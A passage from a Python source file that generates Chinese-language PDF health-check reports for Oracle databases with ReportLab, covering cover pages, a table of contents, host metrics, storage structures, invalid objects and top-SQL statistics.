lastpage_template = PageTemplate(id='last_page', frames=frame_last_page, onPage=self.on_last_page)\n\n self.addPageTemplates([firstpage_template, mainpage_template, lastpage_template])\n \n self.rptsettings = conf.getReportSetting()\n \n #print(self.rptsettings)\n\n def afterFlowable(self, 
flowable):\n \"Registers TOC entries.\"\n if flowable.__class__.__name__ == 'Paragraph':\n styleName = flowable.style.name\n if styleName[:7] == 'Heading':\n key = str(hash(flowable))\n self.canv.bookmarkPage(key)\n\n # Register TOC entries.\n level = int(styleName[7:])\n text = flowable.getPlainText()\n\n pageNum = self.page - 1\n # Try calling this with and without a key to test both\n # Entries of every second level will have links, others won't\n if level % 2 == 1:\n self.notify('TOCEntry', (level, text, pageNum, key))\n else:\n self.notify('TOCEntry', (level, text, pageNum))\n\n key = str(hash(flowable))\n canvas = self.canv\n canvas.setFont(myFontName, 12)\n\n # 在页眉生成格式为标题1的标题内容\n global gtext\n if text and level == 0:\n gtext = text\n canvas.drawString(1.1 * inch, 11.10 * inch, gtext)\n\n # 生成标签\n canvas.bookmarkPage(key)\n canvas.addOutlineEntry(text, key, level=level, closed=0)\n\n def on_first_page(self, canvas, doc):\n canvas.saveState()\n\n # 封面字体及字体大小\n canvas.setFont(myFontName, 19)\n\n # 封面背景\n canvas.setFillColorRGB(0.9, 0.9, 0.9)\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n canvas.rect(0 * cm, 0.5 * cm, 25 * cm, 30 * cm, fill=1)\n\n # 封面上下彩线\n count = 0\n for i in range(0, 12):\n if count % 2 == 0:\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n # 设置线的粗细\n canvas.setLineWidth(1)\n else:\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.setLineWidth(3)\n\n # 绘制顶部线\n canvas.line(0 * inch, (0.0 + i * 0.025) * inch, 8.5 * inch, (0 + i * 0.025) * inch)\n # 绘制底部线\n canvas.line(0 * inch, (11.4 + i * 0.025) * inch, 8.5 * inch, (11.4 + i * 0.025) * inch)\n count = count + 1\n\n # 封面标题\n date_range = calendar.monthrange(datetime.datetime.now().year, datetime.datetime.now().month)\n year = str(datetime.datetime.now().year)\n month = str(datetime.datetime.now().month)\n start_date = str(1)\n end_date = str(date_range[1])\n title = self.rptsettings['report_title']\n title1 = self.rptsettings['report_title1']\n if self.rptsettings['report_title2'] and self.rptsettings['report_title2'] != '':\n title2 = self.rptsettings['report_title2']\n else:\n title2 = '(' + year + '/' + month + '/' + start_date + '-' + year + '/' + month + '/' + end_date + ')'\n\n #print((8.3-(8.3/21.5)*title.__len__())/2)\n canvas.setFillColorRGB(0, 0.3, 0.6)\n canvas.setFont(myFontName, 28)\n # width = 8.3*inch\n canvas.drawString(((8.3-(8.3/21.5)*title.__len__())/2)*inch, 10 * inch, title)\n canvas.drawString(((8.3-(8.3/21.5)*title1.__len__())/2) * inch, 9.5 * inch, title1)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.setFont(myFontName, 16)\n canvas.drawString(2.8 * inch, 9 * inch, title2)\n\n\n # 封面中间部分,图片和部分文字\n canvas.setFillColorRGB(0.0, 0.3, 0.6)\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.drawImage(self.rptsettings['cover_logo'], 0 * inch, 3.5 * inch, 600, 330)\n canvas.line(0 * inch, 8.1 * inch, 8.5 * inch, 8.1 * inch)\n canvas.line(0 * inch, 3.5 * inch, 8.5 * inch, 3.5 * inch)\n canvas.setFillColorRGB(0.6, 0.6, 0.6)\n canvas.drawString(0.5 * inch, 5 * inch, '集成技术解决方案')\n canvas.drawString(0.5 * inch, 4.7 * inch, '虚拟化、云计算和大数据')\n canvas.drawString(0.5 * inch, 4.4 * inch, '数据库高端运维服务')\n canvas.drawString(0.5 * inch, 4.1 * inch, '系统、网络与安全')\n\n # 封面右下角\n canvas.drawImage(self.rptsettings['company_logo'], 6.8 * inch, 0.75 * inch, 25, 25)\n canvas.setStrokeColorRGB(0, 0, 0)\n canvas.setFillColorRGB(0, 0.3, 0.6)\n canvas.setFont(myFontName, 12)\n canvas.drawString(7.2 * inch, 0.95 * inch, self.rptsettings['company_name_short'])\n canvas.setFont(myFontName, 11)\n canvas.drawString(7.2 * inch, 0.77 * inch, 
'Vision-IT')\n canvas.setStrokeColorRGB(0, 0.3, 0.6)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.setFont(myFontName, 10)\n canvas.drawString(6.2 * inch, 0.55 * inch, self.rptsettings['company_name'])\n canvas.drawString(6.4 * inch, 0.4 * inch, self.rptsettings['company_website'])\n canvas.setFont(myFontName, 18)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.drawString(1.75 * inch, 3 * inch, '专业运维团队,24X7小时服务,让您更放心!')\n\n canvas.restoreState()\n\n def on_last_page(self, canvas, doc):\n canvas.saveState()\n\n # 封面字体及字体大小\n canvas.setFont(myFontName, 19)\n\n # 封面背景\n canvas.setFillColorRGB(0.9, 0.9, 0.9)\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n canvas.rect(0 * cm, 0.5 * cm, 25 * cm, 30 * cm, fill=1)\n\n # 封面中间部分,图片和部分文字\n for i in range(0, 25):\n if i % 2 == 0:\n canvas.setStrokeColorRGB(0.8, 0.8, 0.8)\n else:\n canvas.setStrokeColorRGB(0.8, 0.8, 0.8)\n\n canvas.setLineWidth((0.025 + 0.01 * i) * inch)\n canvas.line(0 * inch, (8 - (0.05 * i + 0.01 * i * (i + 1) / 2)) * inch, 8.5 * inch, (8 - (0.05 * i + 0.01 * i * (i + 1) / 2)) * inch)\n\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.setLineWidth(3)\n canvas.line(0 * inch, 8.1 * inch, 8.5 * inch, 8.1 * inch)\n canvas.line(0 * inch, 3.5 * inch, 8.5 * inch, 3.5 * inch)\n\n # 封面上下彩线\n count = 0\n for i in range(0, 12):\n if count % 2 == 0:\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n # 设置线的粗细\n canvas.setLineWidth(1)\n else:\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.setLineWidth(3)\n\n # 绘制顶部线\n canvas.line(0 * inch, (0.0 + i * 0.025) * inch, 8.5 * inch, (0 + i * 0.025) * inch)\n # 绘制底部线\n canvas.line(0 * inch, (11.4 + i * 0.025) * inch, 8.5 * inch, (11.4 + i * 0.025) * inch)\n count = count + 1\n\n # 封面右下角\n canvas.drawImage(self.rptsettings['company_logo'], 0.5 * inch, 1.25 * inch, 25, 25)\n canvas.setStrokeColorRGB(0, 0, 0)\n canvas.setFillColorRGB(0, 0.3, 0.6)\n canvas.setFont(myFontName, 12)\n canvas.drawString(0.9 * inch, 1.45 * inch, self.rptsettings['company_name_short'])\n canvas.setFont(myFontName, 11)\n canvas.drawString(0.9 * inch, 1.27 * inch, self.rptsettings['company_name_short_en'])\n canvas.setStrokeColorRGB(0, 0.3, 0.6)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.setFont(myFontName, 12)\n canvas.drawString(0.5 * inch, 1.05 * inch, self.rptsettings['company_name'])\n canvas.setFont(myFontName, 8)\n canvas.drawString(0.5 * inch, 0.9 * inch, '网站:' + self.rptsettings['company_website'])\n canvas.drawString(0.5 * inch, 0.75 * inch, '地址:' + self.rptsettings['company_address'])\n canvas.drawString(0.5 * inch, 0.6 * inch, '电话:' + self.rptsettings['company_telephone'])\n\n BarCodes().genEan13Barcode(canvas, 6.5 * inch, 0.6 * inch, 50, 8)\n\n\n canvas.restoreState()\n\n\n def on_remaining_pages(self, canvas, doc):\n canvas.saveState()\n\n canvas.setFont(myFontName, 9)\n canvas.line(1 * inch, 1 * inch, 7.3 * inch, 1 * inch)\n canvas.line(1 * inch, 11 * inch, 7.3 * inch, 11 * inch)\n canvas.drawString(4 * inch, 0.75 * inch, \"Page %d\" % (doc.page - 1))\n\n canvas.restoreState()\n\n def set_content(self):\n # 设置目录索引等级,这里以设置为一级标题、二级标题、三级标题\n# print(self.rptsettings)\n if self.rptsettings['content_level'] and self.rptsettings['content_level'] != '':\n maxLevels = self.rptsettings['content_level']\n else:\n maxLevels = 3\n\n # Create styles to be used for document headers\n # on different levels.\n headerLevelStyles = []\n for i in range(maxLevels):\n headerLevelStyles.append(makeHeaderStyle(i))\n \n return maxLevels,headerLevelStyles\n\n\nclass OracleReport:\n \"\"\"Test story with TOC and a cascaded header hierarchy.\n\n The story 
should contain exactly one table of contents that is\n immediately followed by a list of cascaded levels of header\n lines, each nested one level deeper than the previous one.\n\n Features to be visually confirmed by a human being are:\n\n 1. TOC lines are indented in multiples of 1 cm.\n 2. Wrapped TOC lines continue with additional 0.5 cm indentation.\n 3. Only entries of every second level have links\n ...\n \"\"\"\n\n def __init__(self,conf,filename):\n doc = MyDocTemplate(conf,filename)\n self.maxLevels,self.headerLevelStyles = doc.set_content()\n self.dbsettings = conf.getDatabaseSetting()\n self.rptsettings = conf.getReportSetting()\n self.pkgsettings = conf.getPackageSetting()\n \n self.doc = doc\n\n\n def makeFirstPart(self):\n story = []\n\n return story\n\n def makeAuthorPart(self):\n story = []\n # 换页,开始新内容\n # 使用内容模版开始写内容\n story.append(NextPageTemplate('remaining_pages'))\n story.append(PageBreak())\n story.append(Paragraph('版权信息', makeListTitleStyle()))\n for cprt in self.rptsettings['copyright']:\n story.append(Paragraph(cprt, makeBodyStyle()))\n\n story.append(Spacer(0, 0.5 * cm))\n story.append(Paragraph('文档属性', makeListTitleStyle()))\n data = [('文档属性', '内容')]\n data.extend([('文档名称', self.rptsettings['report_title'] + self.rptsettings['report_title1']),\n ('文档版本号', self.rptsettings['report_version']),\n ('文档状态', '正式巡检报告'),\n ('文档特性', '自动化'),\n ('生成日期', time.strftime('%Y-%m-%d', time.localtime(time.time())))])\n story.extend(makeTable(data, colwidth=(80, 364)))\n\n story.append(Spacer(0, 0.5 * cm))\n story.append(Paragraph('作者信息', makeListTitleStyle()))\n data = [('姓名', '公司', '职位', '邮箱', '电话')]\n data.extend([('陈英', '贵州维讯信息技术有限公司', '系统工程师', 'ychenid@live.com', '15285649896')])\n story.extend(makeTable(data, colwidth=(48, 136, 64, 116, 80)))\n\n return story\n\n def makeCopInfo(self):\n inPath=self.rptsettings['flowshape']\n story = []\n # 换页\n story.append(PageBreak())\n story.append(Paragraph('1. 故障响应流程', makeListTitleStyle()))\n img = Image(0, 0, 450, 300, inPath)\n d = Drawing(300, 300)\n d.add(img)\n# d.translate(420, 0)\n# d.scale(2, 2)\n# d.rotate(0)\n story.append(d)\n\n story.append(Spacer(0, 1 * cm))\n story.append(Paragraph('2. 项目服务工程师', makeListTitleStyle()))\n data = [('姓名', '公司', '职位', '邮箱', '电话')]\n data.extend(self.rptsettings['author'])\n story.extend(makeTable(data, colwidth=(48, 136, 64, 116, 80)))\n\n story.append(Paragraph('3. 
报告审核签署', makeListTitleStyle()))\n story.append(Spacer(0, 0.2 * cm))\n story.append(Preformatted('文档名称:' + self.rptsettings['report_title'] + self.rptsettings['report_title1'], makeBodyStyle()))\n story.append(Preformatted('副本数量:' + str(self.rptsettings['report_copy']) + '份', makeBodyStyle()))\n story.append(Preformatted('出版单位:' + str(self.rptsettings['company_name']), makeBodyStyle()))\n story.append(Preformatted('出版日期:' + time.strftime('%Y-%m-%d', time.localtime(time.time())), makeBodyStyle()))\n story.append(Spacer(0, 1.5 * cm))\n story.append(Preformatted(80 * str(' ') + '巡检人:_____________ 日期:_____________' , makeBodyStyle()))\n story.append(Preformatted(80 * str(' ') + '审定人:_____________ 日期:_____________' , makeBodyStyle()))\n\n return story\n\n def makeSignature(self):\n story = []\n # 换页\n story.append(PageBreak())\n\n return story\n\n\n def makeContentPart(self):\n # Create styles to be used for TOC entry lines\n # for headers on different levels.\n tocLevelStyles = []\n d, e = tableofcontents.delta, tableofcontents.epsilon\n for i in range(self.maxLevels):\n tocLevelStyles.append(makeTocHeaderStyle(i, d, e))\n\n # Build story.\n story = []\n\n # 生成目录\n story.append(PageBreak())\n story.append(Paragraph(self.rptsettings['content_name'], makeTitleStyle()))\n story.append(Spacer(0, 1 * cm))\n toc = tableofcontents.TableOfContents()\n toc.levelStyles = tocLevelStyles\n story.append(toc)\n\n return story\n\n def makeManagedResourcetPart(self):\n story = []\n # 换页,开始新内容\n story.append(PageBreak())\n story.append(Paragraph('1. 运维资源对象', self.headerLevelStyles[0]))\n i_count = 1\n data = [('编号', '实例名称', '业务名称', '数据库名', '主机', '数据库版本')]\n for db in self.dbsettings.values():\n data.extend([(i_count, db['instance_name'], db['dbtitle'], db['dbname'], db['host'], db['dbversion'])])\n i_count += 1\n\n story.extend(makeTable(data, title='表1 数据库资源对象', colwidth=(32, 64, 120, 64, 100, 70)))\n return story\n\n def makeDBSummaryPart(self):\n story = []\n # 换页,开始新内容\n story.append(PageBreak())\n story.append(Paragraph('2. 
数据库运行状态概览', self.headerLevelStyles[0]))\n\n d = DrawShape()\n status_online = d.drawArrow(10, 20, 20, 90, 0, -15, colors.green)\n status_offline = d.drawArrow(10, 20, 20, -90, -20, -5, colors.red)\n resource_usage = d.drawBattery(25, 20, 0.05, colors.green)\n crossbox_failure = d.drawCrossbox(20, 20, 20, 0, 0, colors.red, colors.white)\n crossbox_success = d.drawCrossbox(20, 20, 20, 0, 0, colors.green, colors.green)\n\n alert_failure = d.drawAlert(20, 20, 20, 0, 0, 4, colors.red)\n alert_success = d.drawAlert(20, 20, 20, 0, 0, 0, colors.green)\n\n i_count = 1\n data = [('实例', '状态', '库', '监听', 'CPU', '内存', '磁盘', '日志', '表空间', '告警', '备份', 'OGG', 'DG')]\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n dbdata = ['', '', '', '', '', '', '', '', '', '', '', '', '']\n dbdata[0] = db['instance_name']\n\n try:\n inststatus = oracle.instance_status()\n dbstatus = oracle.database_status()\n\n if inststatus[0][3] == 'OPEN':\n dbdata[1] = status_online\n else:\n dbdata[1] = status_offline\n\n if dbstatus[0][2] == 'READ WRITE':\n dbdata[2] = status_online\n else:\n dbdata[2] = status_offline\n\n dbdata[3] = status_online\n\n dbdata[4] = '?'\n dbdata[5] = '?'\n dbdata[6] = '?'\n dbdata[7] = '?'\n dbdata[8] = '?'\n dbdata[9] = '?'\n dbdata[10] = '?'\n dbdata[11] = '?'\n dbdata[12] = '?'\n except Exception:\n dbdata[1] = status_offline\n dbdata[2] = status_offline\n dbdata[3] = status_offline\n dbdata[4] = '?'\n dbdata[5] = '?'\n dbdata[6] = '?'\n dbdata[7] = '?'\n dbdata[8] = '?'\n dbdata[9] = '?'\n dbdata[10] = '?'\n dbdata[11] = '?'\n dbdata[12] = '?'\n\n data.extend([(dbdata[0], dbdata[1], dbdata[2], dbdata[3], dbdata[4], dbdata[5], dbdata[6], dbdata[7], dbdata[8], dbdata[9], dbdata[10], dbdata[11], dbdata[12])])\n i_count += 1\n\n# for db in self.dbsettings.values():\n# data.extend([('prod1',status_online,status_online,status_offline,resource_usage,resource_usage,resource_usage,\n# status_online,status_online,alert_failure,crossbox_failure,status_online,status_online)])\n# i_count += 1\n story.extend(makeTable(data, title='表2.1 数据库资源状态', colwidth=(56, 32, 32, 32, 32, 32, 32, 32, 40, 32, 32, 32, 32)))\n\n\n i_number = 1\n for db in self.dbsettings.values():\n hostmetric = HostMetric(db['host'], db['host_username'], db['host_password'], db['host_port'], self.pkgsettings['syslogin'])\n\n #print(hostmetric)\n story.append(Paragraph('(' + str(i_number) + ')' + db['dbtitle'] + '服务器当前状态', makeBodyStyle()))\n title = ''\n\n # 获取服务器负载信息\n data = [['Server', '1 mins', '5 mins', '15 mins']]\n try:\n results = hostmetric.get_load_metric()\n results = [db['dbtitle'], results[0][0], results[0][1], results[0][2]]\n note = ''\n except Exception:\n results = ['', '', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.append(results)\n\n story.append(Paragraph('>> 负载', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(80, 125, 120, 120)))\n\n # 获取CPU信息\n data = [['Server', 'CPU Used Ratio']]\n try:\n resutls = hostmetric.get_cpu_metric()\n\n results = [db['dbtitle'], resutls]\n note = ''\n except Exception:\n results = ['', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.append(results)\n story.append(Paragraph('>> CPU', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(80, 365)))\n\n # 获取内存信息\n data = [['Server', 'MemTotal', 'MemFree', 'Mem Used Rate']]\n try:\n results = hostmetric.get_mem_metric()\n results = [db['dbtitle'], 
results['MemTotal'], results['MemFree'], results['MemUsedRate']]\n note = ''\n except Exception:\n results = ['', '', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.append(results)\n story.append(Paragraph('>> 内存', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(80, 120, 120, 125)))\n\n # 获取磁盘使用信息\n data = [['FileSystem', 'Size', 'Used', 'Avail', 'Use%', 'Mounted on']]\n try:\n results = hostmetric.get_disk_metric()\n results = results[1:]\n note = ''\n except Exception:\n results = ['', '', '', '', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.extend(results)\n\n story.append(Paragraph('>> 磁盘', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(220, 32, 32, 32, 48, 96)))\n\n # 获取网卡使用信息\n data = [['Face', 'Bytes', 'Drop']]\n try:\n results = hostmetric.get_net_metric()\n results = results[1:]\n note = ''\n except Exception:\n results = ['', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.extend(results)\n story.append(Paragraph('>> 网络', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(100, 175, 175)))\n\n i_number += 1\n\n return story\n\n def makeStoragePart(self):\n story = []\n story.append(PageBreak())\n story.append(Paragraph('3. 数据库存储结构', self.headerLevelStyles[0]))\n\n i_number = 1\n\n story.append(Paragraph('3.1. 数据库物理存储结构', self.headerLevelStyles[1]))\n story.append(Paragraph('3.1.1 控制文件', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '控制文件及副本'\n data = [('STATUS', 'NAME', 'SIZE')]\n\n try:\n results = oracle.controlfile()\n i_count = 0\n for i in results:\n if i[0] is None:\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个数据控制文件,其中有效文件有' + str(i_count) + '个,无效文件有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n\n\n story.extend(makeTable(data, title, note, colwidth=(64, 300, 80)))\n i_number += 1\n\n story.append(Paragraph('3.1.2 日志文件', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '日志文件'\n data = [('GROUP', 'STATUS', 'TYPE', 'MEMBER')]\n\n try:\n results = oracle.logfile()\n logcount = oracle.logcount()\n\n i_count = 0\n for i in results:\n if i[1] is None:\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(logcount[0][0]) + '日志组,' + str(len(results)) + '个日志文件文件,其中有效文件有' + str(i_count) + '个,无效文件有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(3))\n data.extend(results)\n\n\n story.extend(makeTable(data, title, note, colwidth=(64, 80, 80, 220)))\n i_number += 1\n\n story.append(Paragraph('3.1.3 数据文件', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' 
+ str(i_number) + ' ' + db['dbtitle'] + '数据文件存储结构'\n data = [('ID', 'NAME', 'STATUS', 'SIZE', 'MAXSIZE', 'EXTENSIBLE')]\n\n try:\n results = oracle.datafile()\n i_count = 0\n for i in results:\n if i[2] == 'ONLINE' or i[2] == 'SYSTEM':\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个数据文件,其中在线文件有' + str(i_count) + '个,离线文件有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n\n\n story.extend(makeTable(data, title, note, colwidth=(32, 150, 64, 64, 64, 81)))\n i_number += 1\n\n story.append(Paragraph('3.2. 数据库逻辑存储结构', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '表空间及使用情况'\n data = [('NAME', 'STATUS', 'TOTAL', 'USED', 'FREE', 'USEDPCT')]\n\n try:\n results = oracle.tablespace()\n i_count = 0\n for i in results:\n if i[1] == 'ONLINE':\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个表空间,其中在线有' + str(i_count) + '个,离线有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(118, 81, 64, 64, 64, 64)))\n i_number += 1\n return story\n\n def makeDBObjectPart(self):\n story = []\n story.append(PageBreak())\n story.append(Paragraph('4. 数据库对象监测', self.headerLevelStyles[0]))\n story.append(Paragraph('4.1 数据库无效对象', self.headerLevelStyles[1]))\n i_number = 1\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '数据库无效对象'\n\n data = [('OWNER', 'NAME', 'TYPE', 'STATUS')]\n\n try:\n results = oracle.invalid_objects()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效对象。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(90, 164, 100, 100)))\n i_number += 1\n\n story.append(Paragraph('4.2. 数据库无效触发器', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '数据库无效触发器'\n\n data = [('OWNER', 'TRIGGER', 'TABLE', 'STATUS')]\n try:\n results = oracle.disabled_triggers()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效触发器。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(90, 164, 100, 100)))\n i_number += 1\n\n story.append(Paragraph('4.3. 数据库无效索引', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表4.' 
+ str(i_number) + ' ' + db['dbtitle'] + '无效索引'\n\n data = [('OWNER','NAME', 'TABLE', 'TABLESPACE', 'STATUS')]\n\n try:\n results = oracle.invalid_indexes()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效索引。'\n except Exception:\n results = [('', '', '', '','')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0,2))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(80,90, 104, 80, 80)))\n i_number += 1\n\n story.append(Paragraph('4.4. 数据库无效约束', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '无效约束'\n\n data = [('OWNER', 'NAME', 'TABLE', 'TYPE', 'STATUS')]\n try:\n results = oracle.disabled_constraints()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效约束。'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0, 1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(80, 84, 80, 100, 100)))\n i_number += 1\n\n story.append(Paragraph('4.5. 数据库组件对象', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '数据库组件'\n\n data = [('ID', 'NAME', 'VERSION', 'STATUS')]\n try:\n results = oracle.register()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个组件。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0, 1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(80, 134, 130, 100)))\n i_number += 1\n\n return story\n\n def makePerformancePart(self):\n story = []\n story.append(PageBreak())\n story.append(Paragraph('5. 数据库性能分析', self.headerLevelStyles[0]))\n i_number = 1\n\n story.append(Paragraph('5.1 SQL性能统计', self.headerLevelStyles[1]))\n\n story.append(Paragraph('5.1.1 最近CPU消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库CPU消耗之SQL'\n\n data = [('SQL_ID', 'SQL_TEXT', 'CPU_TIME', 'DISK_READ_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_cpu_top_hist()\n note = '注释:以上列出的是最近消耗CPU资源排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 64, 100, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.2 最近物理读消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' 
+ str(i_number) + ' ' + db['dbtitle'] + '数据库IO消耗之SQL'\n\n data = [('SQL_ID', 'SQL_TEXT', 'DISK_GETS_TIME', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_disk_top_hist()\n note = '注释:以上列出的是最近消耗IO资源排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.3 最近逻辑读消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库逻辑读消耗之SQL'\n\n data = [('SQL_ID', 'SQL_TEXT', 'BUFFER_GETS_TIME', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_buffer_top_hist()\n note = '注释:以上列出的是最近逻辑读资源消耗排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.4 最近执行次数最多的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库SQL执行次数统计'\n\n data = [('SQL_ID', 'SQL_TEXT', 'EXECUTIONS', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_executions_top_hist()\n note = '注释:以上列出的是最近执行次数排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.5 最近排序消耗最高的前10条SQL', 